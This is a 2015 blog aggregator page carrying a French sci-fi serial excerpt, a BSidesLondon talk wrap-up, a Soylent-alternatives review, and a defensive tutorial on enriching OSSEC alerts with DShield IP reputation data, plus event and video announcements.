— Il y a un peu de ça, c’est vrai. Le pouvoir a également besoin de contre-pouvoirs fantoches afin d’occuper les esprits et de dissuader les rebellions les plus profondes. Depuis que la religion est tombée en décrépitude, nous avons du nous rabattre sur les médias et les syndicats.
— Quoi ? Mais… Tu n’es donc qu’une ordure ?

Le jeune homme s’est arrêté et regarde le plus âgé avec une fureur à peine contenue. Je sens poindre une vague de violence, de haine. Intérieurement, je me réjouis du spectacle. Mais, à ma grande surprise, l’homme plus âgé lance un regard, un seul accompagné d’un sourire.

— Voyons Nellio. Tu te doutes bien que si je t’ai fait venir ici c’est que j’ai des motifs bien plus nobles.

Incroyable ! Cet homme semble également disposer du Pouvoir. Ou du moins d’une variante. Il est dangereux. Très dangereux !

— Ce que je viens de te dire est la version officielle, celle qui m’a permis d’arriver jusqu’ici sans éveiller les soupçons. Celle qui m’a permis de découvrir une horreur sans nom à laquelle le printeur peut mettre un terme.
— N’essaye pas de m’embrouiller Georges !
— Réfléchis Nellio, pourquoi t’ai-je amené ici si ce n’est pour te convaincre ? Où crois-tu que nous sommes ?
— On dirait une base souterraine pour les cargos spatiaux automatiques. Comme celui-ci. Une véritable pièce de musée qui doit dater de l’époque des mines spatiales.
— Tout juste !
— Enfant, je rêvais de voyager dans l’espace, de devenir astronaute, que ce soit comme mineur ou déboucheur de chiottes. Je ne savais pas encore que toute l’exploitation spatiale avait été abandonnée. Trop peu rentable.
— C’est effectivement ce qu’on peut lire sur les sites historiques. Une belle propagande.
— Car ce n’est pas le cas ?
— Regarde ce vaisseau, il est arrivé cette nuit.
— Quoi ? Mais…
— Il est chargé de marchandises.
— Hein ?

Les deux hommes sont entrés dans le vaisseau. Je tente de m’approcher mais leur voix ne me parvient plus. Qui sont-ils ? Et que font-ils ici ? Est-ce que le Pouvoir aura de l’effet sur eux ? Le plus vieux m’inquiète.

Ils ressortent, tenant à la main une poupée en plastique.
— Mais ces jouets sont complètement démodés. Plus aucun enfant n’en utilise de nos jours.
— Oui, ce vaisseau m’étonne. Il vient de coordonnées auxquelles nous n’avons plus fait de commandes depuis longtemps. Leurs produits ne se vendent plus.
— Que veux-tu dire George ? De quoi parles-tu ?
— Il me reste encore beaucoup à comprendre. Tout ce que je sais c’est que lorsqu’une usine a besoin d’un chargement d’un produit donné, elle remplit un vaisseau de rations alimentaires et l’expédie avec des cordonnées déterminées par le produit désiré. Au retour, le cargo est plein.
— Comment est-ce possible ? Qui remplit le cargo ?
— Je n’ai à ce jour aucune certitude mais toutes les hypothèses que je peux émettre sont toutes plus terribles les unes que les autres.
— Je sais ! Les prisonniers ! Je me souviens qu’il y a quelques années on a expédié les condamnés pour crimes graves dans les astéroïdes miniers désaffectés. Une forme de peine de mort moralement justifiable dans les médias qui avait fait scandale chez les étudiants.
— Ce n’est pas impossible mais ces prisonniers n’ont jamais été plus de quelques milliers, répartis dans toute la ceinture d’astéroïdes. Trop peu nombreux pour créer une industrie.
— Mais pourquoi ne pas faire travailler les télé-pass ? Et qui fabrique donc ces fichus jouets périmés ?
— Les télé-pass sont très protégés, ils ont de la famille, des amis. Et ils sont incompétents. Si nous les formons, il vont commencer à réfléchir, à déstabiliser le système. Si nous les exploitons, cela finirait par se savoir. C’est pourquoi je suis convaincu que ces fichus jouets, comme tu dis, sont produits par des humains qui souffrent, des humains exploités. Peut-être des enfants. Je suis persuadé que cette histoire d’astéroïde n’est qu’un écran de fumée qui sert à masquer un commerce peu avouable avec le sultanat islamiste.
— Quoi ? Tu voudrais dire que les musulmans…
— Quoi de plus logique ? Ils n’ont pas de scrupules, pas de sécurité sociale. Ils ont de la main d’œuvre et de la matière première. Par contre toute la région est un désert ultra-pollué par le pétrole et les retombées radioactives. Ils crèvent donc littéralement de faim.
— C’est… C’est affreux !
— Oui. C’est pourquoi le printeur est un outil primordial. Il nous permettra de mettre fin à cet odieux échange.
— Mais il faut le dénoncer tout de suite ! Il faut arrêter ça immédiatement.
— Nellio, tout ce que nous achetons, tout ce que nous utilisons provient de ces usines cachées. Tes vêtements, ton neurex, ton ordinateur. Sans eux, nous ne sommes plus rien. Sans eux, il deviendra évident que les télé-pass font un travail inutile. Toute notre société risque de s’écrouler ! Le chaos ! L’anarchie !

J’ai cru un moment qu’ils parlaient de l’astéroïde mais les phrases sont complexes, les mots étranges. Changeant d’appui pour mieux entendre, je heurte mon casque de la main. Ce dernier roule sur le sol en un bruit de tonnerre qui se répercute dans tout le hangar. Les deux hommes se figent et se tournent brutalement vers moi.

— Mais qu’est-ce que…
— Qui…

Je me redresse avec lourdeur et, tout en gardant mon regard fixé sur l’extrémité de mes orteils, articule une présentation improvisée :
— G89, à vos ordres chef !

 

Photo par Photophilde.

Merci d'avoir pris le temps de lire ce billet librement payant. Prenez la liberté de me soutenir avec quelques milliBitcoins, une poignée d'euros, en me suivant sur Tipeee, Twitter, Google+ et Facebook !

Ce texte est publié par Lionel Dricot sous la licence CC-By BE.

Flattr this!

by Lionel Dricot at June 08, 2015 04:40 PM

June 07, 2015

Frank Goossens

Video: how to install & use WP YouTube Lyte by Webucator

Webucator, creator of online and onsite training classes, just released this video about the installation and use of WP YouTube Lyte:

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at June 07, 2015 05:55 AM

June 05, 2015

Frank Goossens

Music from Our Tube: Django Django shaking, trembling & rolling

Look and listen to this nice new Django Django video:
YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at June 05, 2015 04:27 AM

June 03, 2015

Xavier Mertens

BSidesLondon 2015 Wrap-Up

BSidesLondon-logoHere is a quick wrap-up of the just finished BSidesLondon. It was already the 5th edition (and my 5th participation!). This year, they moved to a new location close to Earls Court where is organized InfoSec Europe at the same time, good idea for those who want to attend both worlds: Hackers wearing t-shirts VS. Vendors wearing ties! This year, it was just a one-day journey for me, I’m writing this blog post while waiting for my train back to Belgium.

I arrived late due to transport constraints and missed the keynote but I was just in time to attend the first half-day of talks. The first one was presented by Freaky Clown: “How I rob banks”. Following each others on Twitter, it was a good opportunity to also meet him in real life. Working as a pentester, he made a presentation about physical security and how it can be very easy to enter a “secured” building (notice the quotes!). Like a network, once you get it, it’s often game over. Freaked Clown reviewed different mistakes and how badly security controls, gates or receptions are deployed. How easy it is to “abuse” people to allow you to enter a restricted area. All the cases demonstrated by funny pictures and stories. The conclusion to this talk could be: Information security or physical security: both fail! Bad implementations, lack of controls, procedures, installation left in “test” or “debug” mode… About this, I liked the example of the super-safe gate which was left in test mode and operated its doors by itself every x minutes. Just be patient and enter… 

The second talk was about POS (“Point of Sale“) terminal. You know, the portable device with a card reader and a PIN pad which allows you to perform transactions with your credit/debit cards. If I remember well, this was a lightning talks in 2014 but Grigorios Fragkos came back with a talk full of juicy information. A first remark: to perform such kind of research, access to devices is mandatory and they’re not easy to get and use. This must of course be performed in a lab environment. Playing with people’s money can cause you some troubles :-). The talk was a suite of abuse scenario that can be performed with POS terminals like:

There are plenty of POS models on the market and most of them are easy to abuse. Of course, Grigorios did not disclose names, which is understandable. No need of magic or reverse-engineering-fu, some good combinations of keys pressed in the right order and at the right moment are enough to clear the transactions cache or to uninstall the OS… Brilliant and scaring at the same time! I will never see a POS device like before. A special mention to the stupid people who post pictures of their brand new customized credit cards… Grigorios wrote a small Python tool which can generate valid credit-card numbers even when there are are missing numbers… 

The last talk before the lunch break was proposed by Stephen Bonner, a regular speaker at BSidesLondon. He based his talk on samples of Hollywood movies and series.

Stephen on stage

As you can imagine they are completely irrelevant and the problem is that people like them and have false ideas of what is information security. He showed multiple funny samples from well-known movies and demonstrated how bad they are. How to not laugh when you listen to stupid comments like in a famous US serie:

I’ll create a GUI interface in VisualBasic, see if I can track an IP address…

The conclusion: People make decisions based on what they see! Talk about security in a clear way and not in the “Hollywood way“.

After a lunch and network break, Javvad Malik came on state with a talk called “Stay Secure my Friends – My Love-Hate relationship with secops”. As usual, Javvad make the show with funny slides and facts

Javvad on stage

In started in 1999 and still today, vendors are trying to sell us the same sh*t. Nothing really changed. It’s just a question of rebranding but our problems remain the same. But not only vendors were targeted by Javvad, also users and us, infosec professionals. Some topics covered during the talk:

All of those covered with funny (or nightmare – depending on your side) stories. He concluded with some tips for us:

The next talk was presented by Joe Greenwood: “Crash all the things”. Joe was an pilot before he switched to the infosec field and knows his topic. That’s why he decided to focus his research on the communication protocols used between airplanes, specifically the ones used in collision avoidance systems. All airplanes have radio systems which allow them to exchange critical information between them and pilots get visual alerts when a risk of collision occurs. This system is based on the ADS-B and T-CAS protocols. Guess what? Those protocols are completely insecure (no encryption, no authentication, …). For an airplane, any received ADS-B message is generated by another airplane! Why should it be something else? :-). The fact that those protocols are “open” means that anybody can listen to them, that’s why we have nice websites or apps like FlightRadar24.

The goal of Joe’s research was to test if it is possible to send bad messages to an airplane and generate false alerts in the cockpit? It’s of course not easy to test that in real life. Joe built his lab with a HackRF (a classic device when you need to send some packets over the air) and GNURadio. The victim was a flight simulator. Modern simulator, being multiplayer have features to receive ADS-B message from 3rd parties.

Joe on stage

Joe explained how are constructed ADS-B packets and he wrote some tools to generate them on the fly. The presentation ended with a live demo of a Kali VM sending ADS-B message to the flight simulator running on the same laptop. Crazy to suddenly see 10 ghost airplanes displayed on the radar! What about the countermeasures? If they are plenty of ground stations which can detect rogue flights, an airplane has only one antenna which make the always vulnerable. Can you imagine a Raspberry or a Beaglebone with a HackRF dropped close to an big airport and remotely controlled? Very nice talk!

My next choice was to follow an introduction to the WifiPhisher tool by George Chatzisofroniou. Today, wireless networks are deployed everywhere and people use them all the time. This remains definitively a good attack vector based on the following fact:

75% of the Americans would feel grumpier after one week without WiFi than without coffee!

Before speaking about his tool, George explained how his tool works (and any other apps of the same kind). 802.11 has many weaknesses that keeps it vulnerable to classic attacks even if encryption is used (WEP/WPA/WPA2). The management frames (beacon frames & probe requests) are always send in clear. What happened when a device see two access-points with the same ESSID? Usually, the network manager choose the one which has the stronger signal. Based on all these information, we are facing classic attacks like Karma, Evil Twin. Those were also explained by George. Nothing brand new but always a good reminder. The second part of the talk focused on the tool WifiPhisher. It looks to be interesting because it integrates all the steps to collect passphares and/or credentials from targeted users (a typical target for WifiPhisher are users being a capture portal). A nice feature is the detection mechanism of the access-point using the MAC address to propose to the victim a specific fake webpage. Note that if you’ve a PineApple (link), you can basically achieve the same results with extra infusions.

Then, Jessica Barker proposed a non-technical but interesting talk: “Bringing Infosec to the masses”. She discussed the fact that we are talking different languages. She started by speaking in Klingon. Nobody understood! It’s the same in the information security field: we are talking to people with the wrong language. The goal is to reduce the gap between people and technologies but using the right words to attract their attention. We, as infosec, are trying to protect computers used by people that do not think as ourselves! 

Finally, the event was wrapped with a talk about “Intelligence-led penetration testing” by Cam Buchanan. Why this talk? While a customer ask a pentester to test its security, often the scope is restricted to classic stuff like the perimeter, a DMZ, a website, etc. But for a while, many organisations are targeted by very malicious piece of codes which do not follow any rules and do not stick to a restricted scope. Cam’s idea was to use the same techniques to perform the pentest. For each step of a classic attack, he reviewed how it can be applied to a “legal” pentest with the caveats of all steps. Interesting idea! IMHO, not all organisations are ready to allow a so-broad and risky scope…

That’s the wrap-up of the talks that I attended. There was 3 slots in parallel (two main rooms and the rookie track) with some workshops. From what I eared, the rookie track was very successful. I hope to see all the presentations online soon! Next event for me, BSidesLisbon in one month.

by Xavier at June 03, 2015 10:10 PM

June 02, 2015

Les Jeudis du Libre

Mons, le 18 juin – FusionDirectory : Simplifiez la gestion de votre infrastructure !

FusionDirectoryCe jeudi 18 juin 2015 à 19h se déroulera la 40ème séance montoise des Jeudis du Libre de Belgique.

Le sujet de cette séance : FusionDirectory : Simplifiez la gestion de votre infrastructure !

Thématique : Infrastructure|Administration système|Déploiement|LDAP

Public : Tout public

L’animateur conférencier : Benoit Mortier (OpenSides)

Lieu de cette séance : Campus technique (ISIMs) de la Haute Ecole en Hainaut, Avenue V. Maistriau, 8a, Salle Académique, 2e bâtiment (cf. ce plan sur le site de l’ISIMs, et ici sur la carte Openstreetmap).

La participation sera gratuite et ne nécessitera que votre inscription nominative, de préférence préalable, ou à l’entrée de la séance. Merci d’indiquer votre intention en vous inscrivant via la page http://jeudisdulibre.fikket.com/. La séance sera suivie d’un verre de l’amitié.

Les Jeudis du Libre à Mons bénéficient aussi du soutien de nos partenaires : CETIC, Normation, OpenSides, MeaWeb, NextLab, Phonoid et Creative Monkeys.

Si vous êtes intéressé(e) par ce cycle mensuel, n’hésitez pas à consulter l’agenda et à vous inscrire sur la liste de diffusion afin de recevoir systématiquement les annonces.

Pour rappel, les Jeudis du Libre se veulent des espaces d’échanges autour de thématiques des Logiciels Libres. Les rencontres montoises se déroulent chaque troisième jeudi du mois, et sont organisées dans des locaux et en collaboration avec des Hautes Écoles et Facultés Universitaires montoises impliquées dans les formations d’informaticiens (UMONS, HEH et Condorcet), et avec le concours de l’A.S.B.L. LoLiGrUB, active dans la promotion des logiciels libres.

Description : Aujourd’hui le défi est de savoir comment gérer la complexité et la diversité d’une infrastructure informatique. Cela commence par la centralisation des informations de l’utilisateur et de ses différents comptes sur plusieurs systèmes et va jusqu’au déploiement des systèmes basés sur Linux ou Windows dans des environnements différents.

Il y a beaucoup d’applications maisons écrites pour gérer les données stockées dans votre serveur LDAP, mais la plupart d’entre elles sont difficiles à utiliser ou mal écrites, difficiles à maintenir et nécessitent des correctifs réguliers pour fonctionner valablement.

Le projet FusionDirectory a pour but de combler cette lacune en fournissant une application web agréable qui vous permette non seulement de gérer vos données LDAP classiques comme les utilisateurs, groupes, services …, mais aussi vous offrir une API permettant d’écrire de nouveaux plugins, pour étendre ses fonctionnalités et correspondre a vos besoins.

L’intégration avec d’autres solutions est réalisée en fournissant une interface qui fonctionne toujours de la même façon. FusionDirectory est construit avec un noyau et un grand ensemble de plugins qui permettent de gérer une grande partie de la complexité d’une infrastructure d’aujourd’hui. Une liste est disponible ici.

Au cours de l’exposé basé sur des cas d’utilisation réels, nous allons montrer où en est FusionDirectory après 3 ans d’existence, où il est utilisé et comment il est utilisé pour gérer l’infrastructure, pourquoi nous choisissons LDAP comme stockage et finalement ce que nous prévoyons pour l’avenir.

by Didier Villers at June 02, 2015 09:27 PM

Lionel Dricot

Est-il encore nécessaire de manger ?

3440941185_d205725d34_z

Une étude et une comparaison des différents substituts à la nourriture traditionnelle (de type Soylent) disponibles en Europe.

Il est amusant de constater que la moindre remise en question de votre alimentation transformera tout votre entourage en diététiciens expérimentés prêts à vous apprendre la vie. Vous tentez un régime vegan ? Tout le monde s’inquiétera soudainement pour votre apport en vitamine B12, même ceux qui n’en avaient jamais entendu parler et ne s’en étaient jamais tracassés. Vous suggérez un menu végétarien ? L’être humain est soudainement “naturellement carnivore”, ce qui devrait clore tout débat.

Bref, la bouffe c’est sacré, c’est une religion. Remettre en question une vie d’habitudes alimentaires, c’est se heurter à la barrière de la foi, c’est dresser contre vous les ayatollahs de la tradition.

Mais au fond, quel est le rôle premier de la nourriture ? Réponse : apporter à votre corps une série de nutriments.

Est-ce qu’on ne pourrait pas optimiser cela en apportant au corps directement les nutriments dont il a besoin plutôt que de passer par un processus extrêmement complexe qui comporte l’achat de matériaux nutritifs, leur conservation, leur préparation, leur ingestion suivant un rituel bien codifié et le nettoyage final de tous les outils mis en œuvre ?

Après tout, on le fait bien pour les animaux : mon vétérinaire m’a assuré que les croquettes contenaient tout ce dont mon chat a besoin. Depuis, je regarde mon chat avec envie. Pourquoi n’y a-t-il pas des croquettes pour les humains ?

C’est exactement le défi que s’est lancé Soylent, une startup américaine qui a pour but d’offrir une poudre à mélanger dans de l’eau qui contient exactement ce dont le corps a besoin. J’en vois certains d’entre vous bondir…

Mais on ne sait pas mesurer précisément ce dont notre corps a besoin. Nous sommes différents.

En effet. Mais est-ce que la nourriture traditionnelle est meilleure en ce sens ? Avez-vous la moindre idée des nutriments que vous avez avalés au cours des dernières 24h ? Pire, notre alimentation traditionnelle a tendance à nous apporter trop de certains types de nutriments, pas assez d’autres et également nous faire ingérer des substances non-nécessaires qui peuvent s’avérer nocives (les pesticides, certains conservateurs ou additifs, …).

Si vous avez commencé votre journée avec une tartine au choco, un café, pris un sandwich et un coca à midi avant de finir avec un spaghetti bolo, pouvez-vous réellement affirmer que votre alimentation a été plus saine qu’une personne qui a passé toute la journée avec du Soylent ? Est-ce réellement préférable de manger des céréales le matin, une salade à midi et un menu trois services au restaurant le soir ? La réponse objective est que vous n’en savez rien, vous vous fiez à vos sensations pour savoir ce qui est bon pour vous.

Mais le repas a également une fonction sociale !

Est-ce que vos trois repas par jour ont une fonction sociale ? Vraiment ? Si c’était le cas, les fast food, les sandwichs n’existeraient pas.

Historiquement, le fait de se nourrir prend tellement de temps qu’il est devenu traditionnel d’associer ce temps perdu avec d’autres fonctions : sociabiliser, se reposer le corps et l’esprit. Mais il n’existe aucune corrélation avec les repas autre que l’habitude. Dissocier les repas peut même être une excellente chose. Il m’arrive souvent d’être concentré et productif mais que mon corps aie faim. Cela me force à m’arrêter, à prendre une pause, cassant mon rythme. Plus tard, lorsque mon esprit sera fatigué, je culpabiliserai à l’idée de prendre une seconde pause.

Mais manger est un plaisir. La cuisine est un art.

Manger peut en effet être un plaisir pour certains. Il existe également des gens pour qui manger est tout simplement une corvée nécessaire à la vie. D’autres qui l’apprécient quand ils ont le temps mais qui ont d’autres priorités dans la vie. Si manger est un plaisir pour vous, pourquoi ne pas accepter que d’autres s’en passent ? Il existe des milliers de façons pour les humains d’exprimer leur art et chaque individu a le droit de choisir ce qui lui convient. Après tout, la fécondation in-vitro n’a jamais menacé votre sexualité.

Mais…

Bref, n’ayant jamais été particulièrement attiré par la nourriture, le concept de Soylent m’a tout de suite plu et j’ai décidé de le tester. Soylent n’est pas encore disponible en Europe mais la formule étant ouverte et libre, beaucoup de startups s’en sont inspiré. Pour vous, mes chers lecteurs, j’ai donc décidé de tester les alternatives européennes au Soylent.

Joylent (NL)

Joylent est actuellement le leader sur le marché européen et le premier que j’ai testé. Le produit se veut fun et se décline en 4 goûts : Fraise, Banane, Vanille et Chocolat.

joylent1

Une caisse de Joylent (photo issu du blog Joylentfor30days)

Utilisant de la protéine de lait comme base, le Joylent est légèrement écœurant. Le goût est fort sucré et les arômes font très artificiels. L’ingestion de Joylent doit donc se faire calmement et ne plaira pas à tout le monde. Ceci dit, on s’habitue assez vite.

L’effet est assez étrange : la faim ne semble pas tout à fait calmée mais on ne ressent aucun manque. Contrairement à un repas normal, pas de somnolence, pas de pic glycémique. Étonnamment, je n’ai constaté aucune fringale à l’heure du goûter. Lorsque la faim revient réellement, c’est généralement à l’heure du prochain repas.

Joylent est fourni par sac de 3 portions, ce qui n’est pas très pratique mais réduit sensiblement les déchets. Les livraisons sont rapides, le support est hyper réactif. Le repas coûte 2€.

À noter que Joylent travaille sur une version vegan sans produits laitiers.

Mana (CZ)

Mana est une alternative qui fait également beaucoup parler d’elle. À l’opposé de Joylent, Mana se veut sérieux, de qualité, garanti sans OGM. Mana n’est pas aromatisé et ne se base pas sur du lait. La poudre est donc entièrement vegan. Par contre, Mana doit être mélangé avec de l’huile, fournie en petites bouteilles. L’huile originale était un mélange d’huile végétale et d’huile de poisson. Elle est désormais entièrement végétale ce qui rend Mana compatible avec un régime vegan.

MANA-front-starter

Contrairement à Joylent, Mana n’est pas poudreux mais fait de “flocons” qui tombent dans le bas du verre. Le fond du verre donne l’impression de manger une sorte de porridge.

De toutes les solutions testées, Mana est la seule qui m’a donné un gros coup de barre digestif. J’ai du m’allonger et faire une sieste. À mon réveil, je crevais de faim. Expérience peu concluante donc.

Les commandes sont particulièrement longues à être livrées (plusieurs semaines). Les sachets contiennent trois portions et sont livrés avec des petits flacons d’huile gradués contenant également 3 portions. Le repas revient aux alentours de 3,5€.

Queal (NL)

Tout comme Joylent, Queal est néerlandais. Mais la ressemblance ne s’arrête pas là : Queal est vraiment très proche de Joylent. Une base de protéine de lait (donc non vegan) mais une plus grande variété de goûts.

Contrairement à Joylent, les goûts semblent moins artificiels. Certains sont même franchement bons (j’adore le chocolat-cacahuète) et il existe un goût “neutre” sans arôme ajouté qui est parfait pour mélanger avec les goûts plus prononcés.

Queal-Product-Shott

Il est nécessaire d’ajouter une cuillerée d’huile végétale. L’huile est fournie sous forme d’une unique bouteille qu’il faudra doser à l’œil. Un peu moins pratique donc.

Au niveau de l’effet, Queal me semble légèrement plus nourrissant que Joylent. De mon expérience, Queal est le plus adapté avant le sport : il n’alourdit pas, calme la faim et fournit de l’énergie pendant plusieurs heures. Un Queal à 14h pour remplacer mon repas de midi m’a permis de tenir sans effort, sans fringale et sans le moindre autre apport jusqu’à 8h du soir au cours d’une après-midi de vélo intense.

Queal est livré par sachet de 3 portions (2€ la portion) mais ces portions sont tellement larges que 3,5 portions me semble plus indiqué. Le support est réactif et la livraison rapide même si l’image générale est moins dynamique et plus orientée marketing que Joylent, qui se veut vraiment proche de ses consommateurs. Notons que Queal est également garanti sans OGM.

Jake (NL)

Toujours chez les Néerlandais, Jake obtient la palme du boulot sérieux : sachet individuel très pratique (mais du coup moins écologique), valeur nutritive détaillée sur le site et les sachets, un blog très informatif sur la nutrition, un compte Twitter réactif. Le tout étant 100% vegan à 3,5€ la portion.

JakeOriginalR340

Le défaut ? Le goût. Il n’existe qu’une seule saveur : vanille. Et c’est assez infâme. Vous avez l’impression de boire du lait de soja vanillé ultra-sucré… en poudre. C’est à la limite gerbant. Et, malheureusement, c’est très peu nourrissant : après 2h, on crève de faim.

Jake est assurément la grosse déception de ce test.

Veetal (DE)

À l’opposé de Jake, le site de Veetal ne donne presqu’aucune information. Et la notice qui accompagne les sachets est entièrement en allemand. Certaines informations sont particulièrement bien cachées : Veetal n’est pas Vegan car il contient de la protéine de lait. Par contre, il est garanti sans OGM.

veetal_soylent

Il est également nécessaire de rajouter de l’huile qui n’est pas fournie. Les sachets contiennent trois portions et reviennent à 3€ le repas.

Contrairement à Jake, le goût est une bonne surprise : c’est le seul produit de ce test qui fait ressortir une pointe de salé pas du tout désagréable. Le goût est neutre, un mélange équilibre de salé/sucré qui se laisse boire.

Les autres

Il existe bien d’autres variantes. Dans ma liste, j’ai également noté :

Conclusion

Ce qui m’a fortement marqué avec cette expérience c’est, comme annoncé, l’efficacité. Si, comme moi, vous n’êtes pas un maniaque du goût, un Joylent ou un Queal apporte la valeur nutritive d’un repas avec un temps de préparation de l’ordre de la minute !

La plus grande surprise a été de me rendre compte que je pouvais être productif l’après-midi, n’ayant pas le fameux coup de barre digestif. Je n’imaginais pas que la digestion consommait autant d’énergie chez moi.

Les jours où je consomme un Soylent-like à midi, je n’éprouve plus le besoin de me ruer sur l’armoire à chocolat à 4h. Je consomme également beaucoup moins de plats préparés, de sandwichs, de pizzas surgelées ou de cornets de pâtes. Ma compagne, qui est pourtant passionnée de cuisine, trouve cette alternative particulièrement pratique pour les jours où son business ne lui laisse pas le temps de manger correctement. Avant le sport, les Soylent-like se sont révélés une solution idéale et bon marché.

D’un point de vue productivité, tant intellectuelle que sportive, les Soylent-like sont une véritable révélation et m’apportent un nouveau confort de vie dont j’aurais désormais du mal à me passer.

Bien entendu, je continue à apprécier un restaurant ou un repas avec des amis ou de la famille. Mais je les perçois plutôt comme des événements exceptionnels. J’ai désormais plus l’envie de manger des bonnes choses plutôt qu’en grande quantité. L’envie de manger est moins présente et, étonnamment, après un gros gueuleton, je suis content de pouvoir faire une journée “diète Soylent” pour reposer mon système digestif.

Système digestif qui, entre nous, se porte d’ailleurs beaucoup mieux. J’ai des intestins particulièrement irritables et les soylents semblent une bénédiction pour eux. Même si, je vous préviens, la courte période d’adaptation à ce type de nourriture n’est pas sans une certaine propension aux flatulences.

Photo par l@mie. Cet article n’a reçu le soutien d’aucune des marques citées et a nécessité un investissement non négligeable afin de se procurer un échantillon représentatif. S’il vous l’avez trouvé intéressant, n’hésitez pas à y contribuer librement.

Merci d'avoir pris le temps de lire ce billet librement payant. Prenez la liberté de me soutenir avec quelques milliBitcoins, une poignée d'euros, en me suivant sur Tipeee, Twitter, Google+ et Facebook !

Ce texte est publié par Lionel Dricot sous la licence CC-By BE.

Flattr this!

by Lionel Dricot at June 02, 2015 04:53 PM

Xavier Mertens

Playing with IP Reputation with Dshield & OSSEC

Reputation[This blogpost has also been published as a guest diary on isc.sans.org]

When investigating incidents or searching for malicious activity in your logs, IP reputation is a nice way to increase the reliability of generated alerts. It can help to prioritize incidents. Let’s take an example with a WordPress blog. It will, sooner or later, be targeted by a brute-force attack on the default /wp-admin page. In this case, IP reputation can be helpful: An attack performed from an IP address reported as actively scanning the Internet will not (or less) attract my attention. On the contrary, if the same kind of attack is coming from an unkown IP address, this could be more suspicious…

By using a reputation system, our monitoring tool can tag an IP address with a label like “reported as malicious” based on a repository. The real value of this repository depends directly of the value of collected information. I’m a big fan of dshield.org, a free service provided by the SANS Internet Storm Center. Such service is working thanks to the data submitted by many people across the Internet. For years, I’m also pushing my firewall logs to dshield.org from my OSSEC server. I wrote a tool to achieve this: ossec2dshield. By contributing to the system, it’s now time to get some benefits from my participation: I’m re-using the database to automatically check the reputation of the IP addresses attacking me. We come full circle!

To achieve this, let’s use the API provided on isc.sans.org and the OSSEC feature called “Active-Response” which allows to trigger a script upon a set of conditions. In the example below, we call the reputation script with our attacker address for any alert with a level >= 6.

<command>
    <name>isc-ipreputation</name>
    <executable>isc-ipreputation.py</executable>
    <expect>srcip</expect>
    <timeout_allowed>no</timeout_allowed>
</command>
<active-response>
    <!-- Collect IP reputation data from ISC API
      -->
    <command>isc-ipreputation</command>
    <location>server</location>
    <level>6</level>
</active-response>

(Check the Active-Response documentation for details)

The ISC API can be used to query information about an IP address. The returned results are:

$ wget -O - -q https://isc.sans.edu/api/ip/195.154.243.219?json
{"ip":{"abusecontact":"unknown","number":"195.154.243.219","country":" FR ","as":"12876 ","asname":" AS12876 ONLINE S.A.S.,FR","network":" 195.154.0.0\/16 ","comment":null}}

The most interesting fields are:

The script “isc-ipreputation.py” can be used from the command line or from an OSSEC Active-Response configuration block. To reduce the requests against the API, a SQLite database is created and populated with a local copy of the data. Existing IP addresses will be checked again after a specified TTL (time-to-live), by default 5 days. Data are also dumped in a flat file or Syslog for further processing by another tool. Here is an example of entry:

$ tail -f /var/log/ipreputation.log
[2015-05-27 23:30:07,769] DEBUG No data found, fetching from ISC
[2015-05-27 23:30:07,770] DEBUG Using proxy: 192.168.254.8:3128
[2015-05-27 23:30:07,772] DEBUG Using user-agent: isc-ipreputation/1.0 (blog.rootshell.be)
[2015-05-27 23:30:09,760] DEBUG No data found, fetching from ISC
[2015-05-27 23:30:09,761] DEBUG Using proxy: 192.168.254.8:3128
[2015-05-27 23:30:09,762] DEBUG Using user-agent: isc-ipreputation/1.0 (blog.rootshell.be)
[2015-05-27 23:30:10,138] DEBUG Saving 178.119.0.173
[2015-05-27 23:30:10,145] INFO IP=178.119.0.173, AS=6848("TELENET-AS Telenet N.V.,BE"), Network=178.116.0.0/14, Country=BE, Count=148, AttackedIP=97, Trend=0, FirstSeen=2015-04-21, LastSeen=2015-05-27, Updated=2015-05-27 18:37:15

In this example, you can see that this IP address started to attack on the 21st of April. It was reported 148 times while attacking 97 different IP addresses (This IP is certainly part of a botnet).

The script can be configuration with a YAML configuration file (default to /etc/isc-ipreputation.conf) which is very easy to understand:

logging:
  debug: yes
database:
  path: '/data/ossec/logs/isc-ipreputation.db'
network:
  exclude-ip: '192\.168\..*|172\.16\..*|10\..*|fe80:.*'
  ttl-days: 5
http:
  proxy: '192.168.254.8:3128'
  user-agent: 'isc-ipreputation/1.0 (blog.rootshell.be)'

Finally, the SQLite database can use used to get interesting statistics. Example, to get the top-10 of suspicious IP addresses that attacked me (and their associated country):

$ sqlite3 isc-ipreputation.db 
SQLite version 3.8.2 2013-12-06 14:53:30
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> select ip, count, attacks,country from ip order by count desc limit 10;
61.240.144.66|4507455|32533|CN
218.77.79.43|2947146|63295|CN
61.240.144.65|2408418|24185|CN
61.240.144.64|1947038|22054|CN
61.240.144.67|1759210|25421|CN
184.105.139.67|1678608|63055|US
61.160.224.130|1553361|62140|CN
61.183.128.6|1385025|13829|CN
61.160.224.129|1312580|15202|CN
61.160.224.128|1209176|61006|CN
sqlite>

It is also very easy to generate dynamic lists of IP addresses (or CDB as called by OSSEC). The following command will generate a CDB list with my top-10 of malicious IP addresses:

$ sqlite3 isc-ipreputation.db \
"select ip from ip order by count desc limit 10;"| \
while read IP;
do
echo "$IP:Suspicious";
done >/data/ossec/lists/bad-ips
$ cat /data/ossec/lists/bad-ips
61.240.144.66:Suspicious
218.77.79.43:Suspicious
61.240.144.65:Suspicious
61.240.144.64:Suspicious
61.240.144.67:Suspicious
184.105.139.67:Suspicious
61.160.224.130:Suspicious
61.183.128.6:Suspicious
61.160.224.129:Suspicious
61.160.224.128:Suspicious
$ ossec-makelists
* File lists/bad-ips.cdb needs to be updated

Based on this list, you can add more granularity to your alerts by correlating the attacks with the CDB list. Note that dshield.org proposes a recommended block list ready to be used. A few months ago, Richard Porter explained how to integrate one of them in a Palo Alto Networks firewall. This is a great resource but I think that both are complementary.

The script is available on my github repository.

by Xavier at June 02, 2015 01:35 PM

Frederic Hornain

[Brussels] Red Hat JBoss Fuse Service Works Free hands-on lab on June 04 2015

Red Hat Benelux Workshop

 

Red Hat JBoss Middleware Hands-On Labs, join us for a free hands-on lab at one of our Benelux locations


Have you ever wondered how to get started with the Red Hat JBoss Middleware products? Are you unsure where to begin?
You like to receive information, but would prefer to work with the products on the spot?
Join us for one of our free JBoss Hands on Labs, (formerly known as Red Hat in-house Hackathons).
The next one will be on Jboss Fuse @ Arrow – http://www.arrowecs.be
on Thursday June 04 2015 from 17:00
Woluwedal 30, Sint-Stevens-Woluwe, Brussels- 3rd floor

